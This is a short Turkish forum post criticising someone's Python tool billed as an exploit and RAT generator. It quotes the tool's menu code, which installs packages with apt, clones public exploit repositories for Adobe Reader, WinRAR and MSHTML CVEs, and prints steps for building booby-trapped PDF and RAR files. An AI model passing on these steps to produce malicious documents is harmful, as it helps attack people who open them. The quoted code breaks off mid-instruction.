Bu exploit falan üretmiyor rat hiç değil.
github dan hazır araçları indirip kullanıyorsun ayrıca seçim yaptıktan sonra apt ile pythonu kurmanda çok saçma ve komik olmuş.
bu dosya bir python vm de yorumlanıp çalıştırıyorsa python kurmaya ne gerek var?
ayrıca kontrol yapmadan apt paket yöneticisini kullanmışsın ya kullanıcı zyyper paket yöneticisini kullansaydı?
Python:
a = input(">>>")
if a == '1':
os.system("apt install git")
os.system("apt install python")
os.system("git clone https://github.com/infobyte/Exploit-CVE-2021-21086")
print(Fore.GREEN + "Guide: Generate exploit charstring: python3 .\generate_exploit_charstring.py --output charstring.Embed charstring into a pdf file: python3 .\charstring2pdf.py --filename .\charstring --out exploit.pdf.Open pdf file with Adobe Reader DC.")
if a == '3':
os.system("apt install nodejs")
os.system("apt install git")
os.system("git clone https://github.com/hacksysteam/CVE-2023-21608")
print("Guide: run crash.js and exploit.js")
if a == '2':
os.system("git clone https://github.com/b1tg/CVE-2023-38831-winrar-exploit")
print("""Guide: python cve-2023-38831-exp-gen.py poc
or
python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat poc.rar""")
if a == '4':
os.system("git clone https://github.com/klezVirus/CVE-2021-40444")
print("""Guide: Install
The generator is designed to work on Windows, as it uses the makecab utility. Before usage, be sure to install required dependencies:
With Virtualenv